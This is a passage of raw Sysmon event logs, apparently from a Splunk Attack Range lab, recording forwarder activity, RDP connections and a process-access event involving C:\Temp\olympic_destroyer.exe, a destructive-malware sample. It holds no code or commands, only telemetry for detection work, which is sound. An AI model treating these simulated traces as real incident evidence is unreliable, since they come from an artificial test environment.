Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE09A35E51089E0F3B25489D5DE211F1,SHA256=820B6019AF76C43B21D8F04CDCF0A354BC1F049D2C9D6E6892DFA7EE6FD6D99F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218500Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:27.334{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=271F0C21FBB825FB17576A95C8E789FE,SHA256=8073108B511246E28E093942E6200E390AFBCF0EC320A43DC3E3A952FDD5A94F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294229Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:25.518{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53872-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294228Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:27.300{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1631E95712874FF1D5BC44D76D5255F,SHA256=CEED0DE1F5907E7686D3191AD784FED7D87021205F7688D348CC38D39BFA82DC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218501Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:28.365{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=984D61EE9D77895F008EDEB7E85279FE,SHA256=62A478FA0E2BEB8D846A726ED18CFD7230A393362107D15658F15DDB53EA272C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294230Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:28.315{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A485D8773D97AB98D21A313F35B935BF,SHA256=FC17BAE911BAD76111D778A91E358293B46407D990CC3BA4D11ADFB3BB2E0DDA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294232Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:26.468{C8EA50B7-F11F-6215-0F00-000000003802}304C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse94.232.47.180-45594-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local3389ms-wbt-server 23542300x8000000000000000294231Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:29.340{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3DF4EB83DC8DDE8CB5A11199E38360F,SHA256=598659914B8D11647554D9DFCF6F25E193703B31DB323A82AA079A39EFD721EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218502Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:29.396{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12BB2EDA859618E2A0E390C52A08A17D,SHA256=DD0F08EFA7563FE38468B2B191A9A1BB30E675FFD61857033AC9BF17F91461D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294233Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:30.371{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48DDC93F0734A9FCE26AE9E7FECF37CA,SHA256=63645FD9003FBC6B67B5CE1ECAA641DD74CC63A8EBF9536A98922049DC40952D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218504Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:30.428{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FCA11A8BF44C39B5143046AB7418582,SHA256=1FA3D476E3EC2856293E98E6A1FC9E46194EACA09C4743970549FFAFAFEE4169,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218503Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:30.381{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=0B4B872479CB945C0330182E5E04A2CB,SHA256=C2222662C92E8B5233728FF94C78BE1AF5F9F570E46D10453E3AC8F9074D6A9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294234Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:31.384{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A09D48B6077C8C2CEBD205A7C64CE05E,SHA256=1A85B561BD94E1C4D11C9EEA84BF4CB19C6E023062632D757E70F968892B2785,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218506Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:28.689{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51466-false10.0.1.12-8000- 23542300x8000000000000000218505Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:31.428{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=947A785FB536D2280A9BF1B6DA79C037,SHA256=1D431415AB023FD564EA755C8F517C792A2B7E70B463E568A91055A1CF83531F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218507Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:32.443{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=143CDB43A47FFC37DDBB16590A1BF494,SHA256=4069BADEF8CBB735073515665CFBF6249F215379A006F8A00A0CE53A4446FC93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294236Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:32.403{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A36325682C3A474DA227CED5512580EF,SHA256=431149B7F748D4D95EF5AADFDCE7C88FCA6057C88E3DA73D78301F19DD9A06BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294235Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:32.269{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-144MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218508Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:33.615{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C590513B76D63593ED6F4995382B12F1,SHA256=91615D700330ED0AC6639E14E6AC8E950B20A837326B9C47FE2785A0F5E740F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294240Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:33.439{C8EA50B7-F11F-6215-1300-000000003802}616NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=12DF20F8235AD488633BBDA922F26EA7,SHA256=A7E55C869A16AE2702741BD6FE2687D0D6664673593CA46B72F753DE69D03FBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294239Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:33.406{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A9D183FBC1B42ECD2BA9E8F001C485E,SHA256=065C56689C76346788DBDA5237D3A9D9BAE8D26FFEF8D833EE4D72990FDB22D2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294238Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:30.691{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53873-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294237Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:33.261{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-145MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218509Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:34.616{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52B65611EF62CCC7B403001215670D79,SHA256=9E932E4AE42DA35F63A512F7373F4C42662480A071A4797C6506087B4348B73D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294241Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:34.422{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2684DF97C35F23DBB99DBFCACB0BC40,SHA256=605F3F8EAE2C96455B69C366E1DA99F1F4B3C6AF6F6317F5478A569120DB37BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218510Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:35.726{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7CB3E5A83FCD2E0D6CB385B6F5AC1D04,SHA256=7EE6C35D2F505DBFDDCC98C25AEB4B4C9A1577515FD52B59AEAA0595ADF6FB14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294242Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:35.442{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC6B6A6D5CB6724A9632C0E90F4A6E65,SHA256=FD25BFA60F12DBF20012D9E743FBABC63950613F794F1CCE37FA2FCA620CC4A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218512Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:36.945{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2229EA9291BA584E859BCD39EB76E74F,SHA256=A5DB90C88849378378D4FCAEA5576DA111AD2627FE78A03A2A42AC9D25519356,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294243Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:36.459{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E274CB9761EC58DDB11681592A2A18A,SHA256=76BC2FCBC2D5C55A0126A0A852F2E3327203271677264A18D35B9A23B23FA28F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218511Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:34.659{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51467-false10.0.1.12-8000- 23542300x8000000000000000218513Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:37.945{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6071B653F85B9F048CCFD84E391F3A04,SHA256=2E8700FE1F462A79AD8D9CCFA7C346C5035293B45F5635EB822786B66635DB3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294246Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:37.622{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294245Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:37.622{C8EA50B7-11AA-6216-1605-000000003802}2228ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\yap1cmsg.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=7296EF956D055F02AC92E9B196F36F46,SHA256=696139194BF48C7DFEA36390B84438571AF0DA97A9DDC3502C59B1AC0F673B9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294244Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:37.474{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CDADC032049DFFF1924EC0A2647D9B9,SHA256=C194AB8B7A5DC1E6F0DD8878117626480216D05A4CCE7D1EF99A62457D7D64B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294248Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:38.493{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3A038CC47130F87297B9F6E3EF8E12C,SHA256=4DA6D8F3FDF6A6453A93C137500F1D13D4981A03C23986BF10D2C1163AE59DEA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294247Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:36.632{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53875-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000294249Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:39.494{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C46C001FC89F00262FC8EDEBBD0654F,SHA256=1D5DB99D186E57620585AE8F636C7C462F8B33FB99D18A5015AA669B304E5FF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218514Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:38.994{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E37AD9340E0B17ACA0CBDC38542D6C39,SHA256=99B77B3077A58B8BA3E7720AA196153298E6D34FC4EDD3BF22AFD8CB8F2AEC4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294252Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:40.494{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7ACF5579FF0B8576564D1AF5A2CA018D,SHA256=C818AF69934D0FCBF874C24A42FE0C0C6DACB1E7507D2C72C23C5CF743D9EBB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218515Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:40.040{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F31269C2AA6FB4E460317C7F566000C0,SHA256=739AB3BF696BBC0B68A9BBA28883834454DF57DD89D4B67AC68872BC8538E91C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000294251Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:37.977{C8EA50B7-F11F-6215-0F00-000000003802}304C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse94.232.47.180-4267-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local3389ms-wbt-server 23542300x8000000000000000294250Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:40.125{C8EA50B7-F130-6215-3000-000000003802}2512NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294256Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:41.494{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F8080E284B4C7FC44BB8DBCA308CC21,SHA256=255FD8B5239D1D28A0C0B219E387A1ADC9C334DC4E6518D9E6DDF0C5E7B154FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218516Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:41.103{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2836FA621A36600C28B5754B84ED2284,SHA256=4519DF70A0CCA742EA36B1BF1B47DE72F488C85A21A9E31F84705E84E510F9BD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294255Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:41.410{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000294254Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:41.410{C8EA50B7-13FA-6216-8506-000000003802}6104C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 354300x8000000000000000294253Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:39.583{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53876-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8089- 354300x8000000000000000218518Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:40.583{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51468-false10.0.1.12-8000- 23542300x8000000000000000218517Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:42.338{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=695BEEB317C37487160014EB621E9A5C,SHA256=591C6C1A205F830BD617BFDD9A5F750C4D144FCEED0AB959FB4F5070C9AE2995,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294257Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:42.509{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B3FB681DD3A2B32825CDDBA59FE8442,SHA256=4E25F8AB5882D0C9475D78677F0F69F7C5B8726FEDE115B05FC5313DB159CCC2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294258Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:01:43.524{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C6E9EF168E629FCF5129710D060007EF,SHA256=99BF014391E524081E3AAF9ED701F0B1357CFB5D6A4D7745097532CED17AD89B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218519Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:01:43.573{4F8D34B0-F133-6215-6C00-000000003902}2564NT 